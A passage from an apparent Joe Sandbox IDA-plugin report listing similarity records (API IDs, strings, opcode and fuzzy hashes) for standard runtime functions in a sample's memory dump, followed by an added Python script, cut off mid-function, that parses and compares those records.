                                                                                                                                                                                                                                                            • Opcode ID: 5dcac91248c0014d458aec840eea87d8b317a92cf5de5997ea3edf93bd94a031
                                                                                                                                                                                                                                                            • Instruction ID: b64dd40b253b18a8bbe84778933883f3cd32f1fef348ec2b8a951752d4b9c536
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 5dcac91248c0014d458aec840eea87d8b317a92cf5de5997ea3edf93bd94a031
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 9C116D24F4C662E2FA587722565917D228B9F487B4F084734DC7ECB7D6DE2CB4118702
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.1981599946.00007FF6404E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6404E0000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1981561933.00007FF6404E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1981666255.00007FF64050B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1981734296.00007FF64051E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1981734296.00007FF640523000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1981825972.00007FF640526000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ff6404e0000_rename_me_before.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: DeleteDestroyDialogHandleIconIndirectModuleObjectParam
                                                                                                                                                                                                                                                            • String ID: Unhandled exception in script
                                                                                                                                                                                                                                                            • API String ID: 3081866767-2699770090
                                                                                                                                                                                                                                                            • Opcode ID: a6e7d290dc67b0bb036b84f18c740492a81528deb91c8b42bdc3829a80364304
                                                                                                                                                                                                                                                            • Instruction ID: bbc525334e2aa9c077ecc34c495dd18d7bf194e79ba6aa1856a38e0a29ca8308
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: a6e7d290dc67b0bb036b84f18c740492a81528deb91c8b42bdc3829a80364304
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 80317C32A0DA9299EB24FF61E9552FA6360FF89788F440135EA4D8BB99DF3CD100C700
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.1981599946.00007FF6404E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6404E0000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1981561933.00007FF6404E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1981666255.00007FF64050B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1981734296.00007FF64051E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1981734296.00007FF640523000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1981825972.00007FF640526000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ff6404e0000_rename_me_before.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: Message$ByteCharMultiWide
                                                                                                                                                                                                                                                            • String ID: %s%s: %s$Error$Error/warning (ANSI fallback)
                                                                                                                                                                                                                                                            • API String ID: 1878133881-640379615
                                                                                                                                                                                                                                                            • Opcode ID: 185a5ded7e4d76afdc6dde510c40398ff569d270283616bd23a067f5071c39f1
                                                                                                                                                                                                                                                            • Instruction ID: 8fdea9c080354823018bc7794959ffe1a56e67eba9726776bf4b4746d7d2f12b
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 185a5ded7e4d76afdc6dde510c40398ff569d270283616bd23a067f5071c39f1
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 4321517261CA96A1FA24FB10F4517EA6364FF84788F400136EA8C93B99DF7CD645C780
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.1981599946.00007FF6404E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6404E0000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1981561933.00007FF6404E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1981666255.00007FF64050B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1981734296.00007FF64051E000.00000004.00000001.01000000.00000003.sdmpDownload File
• Associated: 00000001.00000002.1981734296.00007FF640523000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1981825972.00007FF640526000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_7ff6404e0000_rename_me_before.jbxd
Similarity
• API ID: AddressFreeHandleLibraryModuleProc
• String ID: CorExitProcess$mscoree.dll
• API String ID: 4061214504-1276376045
APIs
Memory Dump Source
• Source File: 00000001.00000002.1981599946.00007FF6404E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6404E0000, based on PE: true
• Associated: 00000001.00000002.1981561933.00007FF6404E0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1981666255.00007FF64050B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1981734296.00007FF64051E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1981734296.00007FF640523000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1981825972.00007FF640526000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_7ff6404e0000_rename_me_before.jbxd
Similarity
• API ID: _set_statfp
• String ID:
• API String ID: 1156100317-0
APIs
• FlsGetValue.KERNEL32(?,?,?,00007FF6404F98B3,?,?,00000000,00007FF6404F9B4E,?,?,?,?,?,00007FF6404F9ADA), ref: 00007FF6404FA6BF
• FlsSetValue.KERNEL32(?,?,?,00007FF6404F98B3,?,?,00000000,00007FF6404F9B4E,?,?,?,?,?,00007FF6404F9ADA), ref: 00007FF6404FA6DE
• FlsSetValue.KERNEL32(?,?,?,00007FF6404F98B3,?,?,00000000,00007FF6404F9B4E,?,?,?,?,?,00007FF6404F9ADA), ref: 00007FF6404FA706
• FlsSetValue.KERNEL32(?,?,?,00007FF6404F98B3,?,?,00000000,00007FF6404F9B4E,?,?,?,?,?,00007FF6404F9ADA), ref: 00007FF6404FA717
• FlsSetValue.KERNEL32(?,?,?,00007FF6404F98B3,?,?,00000000,00007FF6404F9B4E,?,?,?,?,?,00007FF6404F9ADA), ref: 00007FF6404FA728
Memory Dump Source
• Source File: 00000001.00000002.1981599946.00007FF6404E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6404E0000, based on PE: true
• Associated: 00000001.00000002.1981561933.00007FF6404E0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1981666255.00007FF64050B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1981734296.00007FF64051E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1981734296.00007FF640523000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1981825972.00007FF640526000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_7ff6404e0000_rename_me_before.jbxd
Similarity
• API ID: Value
• String ID:
• API String ID: 3702945584-0
APIs
Memory Dump Source
• Source File: 00000001.00000002.1981599946.00007FF6404E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6404E0000, based on PE: true
• Associated: 00000001.00000002.1981561933.00007FF6404E0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1981666255.00007FF64050B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1981734296.00007FF64051E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1981734296.00007FF640523000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1981825972.00007FF640526000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_7ff6404e0000_rename_me_before.jbxd
Similarity
• API ID: Value
• String ID:
• API String ID: 3702945584-0
APIs
Strings
Memory Dump Source
• Source File: 00000001.00000002.1981599946.00007FF6404E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6404E0000, based on PE: true
• Associated: 00000001.00000002.1981561933.00007FF6404E0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1981666255.00007FF64050B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1981734296.00007FF64051E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1981734296.00007FF640523000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1981825972.00007FF640526000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_7ff6404e0000_rename_me_before.jbxd
Similarity
• API ID: _invalid_parameter_noinfo
• String ID: verbose
• API String ID: 3215553584-579935070
APIs
Strings
Memory Dump Source
• Source File: 00000001.00000002.1981599946.00007FF6404E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6404E0000, based on PE: true
• Associated: 00000001.00000002.1981561933.00007FF6404E0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1981666255.00007FF64050B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1981734296.00007FF64051E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1981734296.00007FF640523000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1981825972.00007FF640526000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_7ff6404e0000_rename_me_before.jbxd
Similarity
• API ID: _invalid_parameter_noinfo
• String ID: UTF-16LEUNICODE$UTF-8$ccs
• API String ID: 3215553584-1196891531
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.1981599946.00007FF6404E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6404E0000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1981561933.00007FF6404E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1981666255.00007FF64050B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1981734296.00007FF64051E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1981734296.00007FF640523000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1981825972.00007FF640526000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ff6404e0000_rename_me_before.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                                                                                                                                                                                                                                                            • String ID: csm
                                                                                                                                                                                                                                                            • API String ID: 2395640692-1018135373
                                                                                                                                                                                                                                                            • Opcode ID: 8b87fa2c553d9157ee5c92b9fa7cd74c02d8a8cd0f0d05c46c7470457ee5a2ed
                                                                                                                                                                                                                                                            • Instruction ID: ea18bcb2ca4c266a869d2e7a81082bc039e02fc8e56005ab48a7f25f1fed8839
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 8b87fa2c553d9157ee5c92b9fa7cd74c02d8a8cd0f0d05c46c7470457ee5a2ed
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 0D51A132B2D626EADB14FB15E444A787791FB44B89F108130EA5987788EF7CE842C780
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.1981599946.00007FF6404E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6404E0000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1981561933.00007FF6404E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1981666255.00007FF64050B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1981734296.00007FF64051E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1981734296.00007FF640523000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1981825972.00007FF640526000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ff6404e0000_rename_me_before.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: CallEncodePointerTranslator
                                                                                                                                                                                                                                                            • String ID: MOC$RCC
                                                                                                                                                                                                                                                            • API String ID: 3544855599-2084237596
                                                                                                                                                                                                                                                            • Opcode ID: c1bd0f280093dc077c2402edd2c21f20ddcaf15bcc9dc74a739a9fc2baeea3e9
                                                                                                                                                                                                                                                            • Instruction ID: d26ef062bfe7f57b41249af47701fcc6fa16d6a2e638fa0a049ebbc3da8f672a
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: c1bd0f280093dc077c2402edd2c21f20ddcaf15bcc9dc74a739a9fc2baeea3e9
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: B3617F3290CBD5D5EB21EB16E4407AAB7A0FB85794F044225EB9C47B99DF7CE190CB40
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.1981599946.00007FF6404E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6404E0000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1981561933.00007FF6404E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1981666255.00007FF64050B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1981734296.00007FF64051E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1981734296.00007FF640523000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1981825972.00007FF640526000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ff6404e0000_rename_me_before.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                                                                                                                                                                                                                                            • String ID: csm$csm
                                                                                                                                                                                                                                                            • API String ID: 3896166516-3733052814
                                                                                                                                                                                                                                                            • Opcode ID: 35f1ba398413474562c31f87a28067be7b3dedf2abf1bb91a394967b9293af31
                                                                                                                                                                                                                                                            • Instruction ID: 3435bf6396a4e8ad41bffa82bdd1c5e47a5f51866054ab524ff2bc78b19782cd
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 35f1ba398413474562c31f87a28067be7b3dedf2abf1bb91a394967b9293af31
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 1951AF32A0C262E6EB64FF22904436877A1EB55B84F144136DA9C87BD5CF3CEA51CB81
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • CreateDirectoryW.KERNEL32(00000000,?,00007FF6404E324C,?,?,00007FF6404E3964), ref: 00007FF6404E7642
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.1981599946.00007FF6404E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6404E0000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1981561933.00007FF6404E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1981666255.00007FF64050B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1981734296.00007FF64051E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1981734296.00007FF640523000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1981825972.00007FF640526000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ff6404e0000_rename_me_before.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: CreateDirectory
                                                                                                                                                                                                                                                            • String ID: %.*s$%s%c$\
                                                                                                                                                                                                                                                            • API String ID: 4241100979-1685191245
                                                                                                                                                                                                                                                            • Opcode ID: 1156698ca0d33aa8d2468b4f0fdefbfa17a3fd1640f2d1a941dba21d9585616c
                                                                                                                                                                                                                                                            • Instruction ID: 9b46986936144f648d47a0e7b2a7a9439cf12a4469b86afd1b15c1f4fe323bbc
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 1156698ca0d33aa8d2468b4f0fdefbfa17a3fd1640f2d1a941dba21d9585616c
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: D131E821A1DAD2E5EA21FB25E8507EA6254FF94BF4F404231EE6D83BC9DF2CD6018740
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.1981599946.00007FF6404E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6404E0000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1981561933.00007FF6404E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1981666255.00007FF64050B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1981734296.00007FF64051E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1981734296.00007FF640523000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1981825972.00007FF640526000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ff6404e0000_rename_me_before.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: Message$ByteCharMultiWide
• String ID: Error$Error/warning (ANSI fallback)
• API String ID: 1878133881-653037927
• Opcode ID: f4c9aea142df8fc367965a88b37001c6795115f60fce42f8f88369c54fa23369
• Instruction ID: c0eb819fd3564ee5e643f48b34dc94857462298f51cb2860743b6e197fce8d6d
• Opcode Fuzzy Hash: f4c9aea142df8fc367965a88b37001c6795115f60fce42f8f88369c54fa23369
• Instruction Fuzzy Hash: 80118B7262CA96A1FA24FB10F551BA92364FB84B88F901135DA9C87744CF3CD605C740
APIs
Strings
Memory Dump Source
• Source File: 00000001.00000002.1981599946.00007FF6404E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6404E0000, based on PE: true
• Associated: 00000001.00000002.1981561933.00007FF6404E0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1981666255.00007FF64050B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1981734296.00007FF64051E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1981734296.00007FF640523000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1981825972.00007FF640526000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_7ff6404e0000_rename_me_before.jbxd
Similarity
• API ID: Message$ByteCharMultiWide
• String ID: Error/warning (ANSI fallback)$Warning
• API String ID: 1878133881-2698358428
• Opcode ID: bedc3c020f71ec751042cc21f49bee78fdd2451348ef76e59aa444c99166d18b
• Instruction ID: 6898f3b46c731db5639d573c148691f02ad36a90d9b99ba9fc6f534e9f9b8114
• Opcode Fuzzy Hash: bedc3c020f71ec751042cc21f49bee78fdd2451348ef76e59aa444c99166d18b
• Instruction Fuzzy Hash: 73118B7262CA96A1FA24FB10F551BA93364FB84B88F901135DA9C87744CF3CD604C740
APIs
Memory Dump Source
• Source File: 00000001.00000002.1981599946.00007FF6404E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6404E0000, based on PE: true
• Associated: 00000001.00000002.1981561933.00007FF6404E0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1981666255.00007FF64050B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1981734296.00007FF64051E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1981734296.00007FF640523000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1981825972.00007FF640526000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_7ff6404e0000_rename_me_before.jbxd
Similarity
• API ID: FileWrite$ConsoleErrorLastOutput
• String ID:
• API String ID: 2718003287-0
• Opcode ID: 0739f85a4d911baae0561c1f2f5b651aa469f8b70ac1dc09fd50f765aaaafbc7
• Instruction ID: 599a62b5aa2e578da32bb14563ad975de4f9c5d34eedb2e8da3037ad89be6239
• Opcode Fuzzy Hash: 0739f85a4d911baae0561c1f2f5b651aa469f8b70ac1dc09fd50f765aaaafbc7
• Instruction Fuzzy Hash: C4D11372B0CAA1D9E710EF79D4402AD37BAFB45B98B144236CE5E97B99DE38D406C340
APIs
• GetConsoleMode.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6404FC25B), ref: 00007FF6404FC38C
• GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6404FC25B), ref: 00007FF6404FC417
Memory Dump Source
• Source File: 00000001.00000002.1981599946.00007FF6404E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6404E0000, based on PE: true
• Associated: 00000001.00000002.1981561933.00007FF6404E0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1981666255.00007FF64050B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1981734296.00007FF64051E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1981734296.00007FF640523000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1981825972.00007FF640526000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_7ff6404e0000_rename_me_before.jbxd
Similarity
• API ID: ConsoleErrorLastMode
• String ID:
• API String ID: 953036326-0
• Opcode ID: 76adbd728b317254a89cb4c791728419eb9f151af89ead0c9a06842c56e3605f
• Instruction ID: 1ef1bf0e5bd98d2ff22e0bb385fbef1a6847c2f9b2b3b3861d2e4785353c280b
• Opcode Fuzzy Hash: 76adbd728b317254a89cb4c791728419eb9f151af89ead0c9a06842c56e3605f
• Instruction Fuzzy Hash: D791C132E2C672E5F754FB6595502BD2BAAFB44B88F544139DE0EA6B84CF38E4418700
APIs
Memory Dump Source
• Source File: 00000001.00000002.1981599946.00007FF6404E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6404E0000, based on PE: true
• Associated: 00000001.00000002.1981561933.00007FF6404E0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1981666255.00007FF64050B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1981734296.00007FF64051E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1981734296.00007FF640523000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1981825972.00007FF640526000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_7ff6404e0000_rename_me_before.jbxd
Similarity
• API ID: _get_daylight$_isindst
• String ID:
• API String ID: 4170891091-0
• Opcode ID: 8f9731ccc05e5e98dab1658fcebd939f282d40e9b6d5561daf5942648b351509
• Instruction ID: 38937a7f78933b773a99b8541f26dbe591d1cc6131e1339b3253e5b3030255d1
• Opcode Fuzzy Hash: 8f9731ccc05e5e98dab1658fcebd939f282d40e9b6d5561daf5942648b351509
• Instruction Fuzzy Hash: 4951F872F0C122EAFB18FF6599456BC37AAAB1035AF500135DE1D96BE5DF38A642C700
APIs
Memory Dump Source
• Source File: 00000001.00000002.1981599946.00007FF6404E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6404E0000, based on PE: true
• Associated: 00000001.00000002.1981561933.00007FF6404E0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1981666255.00007FF64050B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1981734296.00007FF64051E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1981734296.00007FF640523000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1981825972.00007FF640526000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_7ff6404e0000_rename_me_before.jbxd
Similarity
• API ID: File$ErrorHandleInformationLastNamedPeekPipeType
• String ID:
• API String ID: 2780335769-0
• Opcode ID: 44011dbc5c196255e5d063134f532b0674048b95aab6dcf0e225215e54208c6d
• Instruction ID: 75f6c3af5d72fd27f8e01d6fb3b6d0b9943f265b4ae43a3d0d96952bcbb00385
• Opcode Fuzzy Hash: 44011dbc5c196255e5d063134f532b0674048b95aab6dcf0e225215e54208c6d
• Instruction Fuzzy Hash: 5B516D22E0D661DAFB14FF71D4503BD27AAEB88B58F119535DE0987789DF38E4818740
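The Similarity records in this listing are machine-generated, and the report does not state how the IDs or fuzzy hashes are computed. As an added example, not part of the Joe Sandbox report or its IDA plugin, the Python below parses three records copied verbatim from the listing (the two Message$ByteCharMultiWide wrappers and the ConsoleErrorLastMode helper) into dictionaries, groups them by the first component of API String ID, and compares their Instruction Fuzzy Hashes with a plain positional Hamming distance. The Hamming comparison and the 8-position threshold are assumptions for triage, not Joe Sandbox's similarity metric; what they surface is that the two Message$ByteCharMultiWide functions differ in only four hex digits of their fuzzy hash and only in their String ID, which is the usual signature of one code body instantiated with different string arguments.

```python
"""Parse Joe Sandbox 'Similarity' records and triage near-duplicate functions."""
import re
from typing import Dict, List, Optional, Tuple

# Three records copied from the listing above; the bullets are the report's
# own format. All code below is illustrative, not Joe Sandbox's.
SAMPLE_RECORDS = """\
Similarity
• API ID: Message$ByteCharMultiWide
• String ID: Error$Error/warning (ANSI fallback)
• API String ID: 1878133881-653037927
• Opcode ID: f4c9aea142df8fc367965a88b37001c6795115f60fce42f8f88369c54fa23369
• Instruction Fuzzy Hash: 80118B7262CA96A1FA24FB10F551BA92364FB84B88F901135DA9C87744CF3CD605C740
Similarity
• API ID: Message$ByteCharMultiWide
• String ID: Error/warning (ANSI fallback)$Warning
• API String ID: 1878133881-2698358428
• Opcode ID: bedc3c020f71ec751042cc21f49bee78fdd2451348ef76e59aa444c99166d18b
• Instruction Fuzzy Hash: 73118B7262CA96A1FA24FB10F551BA93364FB84B88F901135DA9C87744CF3CD604C740
Similarity
• API ID: ConsoleErrorLastMode
• String ID:
• API String ID: 953036326-0
• Opcode ID: 76adbd728b317254a89cb4c791728419eb9f151af89ead0c9a06842c56e3605f
• Instruction Fuzzy Hash: D791C132E2C672E5F754FB6595502BD2BAAFB44B88F544139DE0EA6B84CF38E4418700
"""

# "• Field Name: value" (value may be empty, as for String ID with no strings)
FIELD_RE = re.compile(r"^\u2022\s*([^:]+):\s*(.*)$")


def parse_similarity_records(text: str) -> List[Dict[str, str]]:
    """Turn each 'Similarity' block into a dict keyed by its field names."""
    records: List[Dict[str, str]] = []
    current: Optional[Dict[str, str]] = None
    for raw in text.splitlines():
        line = raw.strip()
        if line == "Similarity":
            current = {}
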